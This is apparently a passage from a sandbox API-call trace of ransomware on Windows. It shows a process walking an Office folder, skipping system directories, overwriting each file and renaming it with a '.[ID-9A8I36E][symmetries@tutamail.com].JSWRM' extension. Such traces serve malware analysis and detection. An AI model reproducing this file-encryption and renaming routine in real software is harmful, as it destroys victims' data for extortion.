lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0114.889] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.889] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0114.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.889] CloseHandle (hObject=0x238) returned 1 [0114.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0114.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0114.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0114.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0114.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.892] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa284551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa284551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa2f6cec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOUC_COL.HXT", cAlternateFileName="MSOUC_~1.HXT")) returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2=".") returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="..") returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="...") returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="windows") returned -1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="recovery") returned -1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="perflogs") returned -1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="documents and settings") returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="system volume information") returned -1 [0114.892] lstrcmpiW (lpString1="MSOUC_COL.HXT", lpString2="msocache") returned 1 [0114.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0114.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0114.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0114.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0114.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0114.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0114.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0114.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.893] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=205) returned 1 [0114.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0114.893] ReadFile (in: hFile=0x238, lpBuffer=0x24b510, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0114.894] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.894] WriteFile (in: hFile=0x238, lpBuffer=0x24b510*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24b510*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0114.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0114.894] CloseHandle (hObject=0x238) returned 1 [0114.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0114.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0114.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0114.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0114.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0114.896] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b5d49a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b5d49a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b8364e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOUC_F_COL.HXK", cAlternateFileName="MSOUC_~2.HXK")) returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2=".") returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="..") returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="...") returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="windows") returned -1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="recovery") returned -1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="perflogs") returned -1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="system volume information") returned -1 [0114.896] lstrcmpiW (lpString1="MSOUC_F_COL.HXK", lpString2="msocache") returned 1 [0114.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0114.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0114.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.897] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.897] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0114.897] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.898] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.898] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0114.898] CloseHandle (hObject=0x238) returned 1 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0114.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0114.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0114.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0114.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0114.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0114.899] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b5d49a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b5d49a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b5d49a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOUC_K_COL.HXK", cAlternateFileName="MSOUC_~1.HXK")) returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2=".") returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="..") returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="...") returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="windows") returned -1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="recovery") returned -1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="perflogs") returned -1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="system volume information") returned -1 [0114.900] lstrcmpiW (lpString1="MSOUC_K_COL.HXK", lpString2="msocache") returned 1 [0114.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0114.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOUC_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0114.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0114.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.901] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.901] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0114.901] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.902] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.902] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0114.902] CloseHandle (hObject=0x238) returned 1 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0114.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 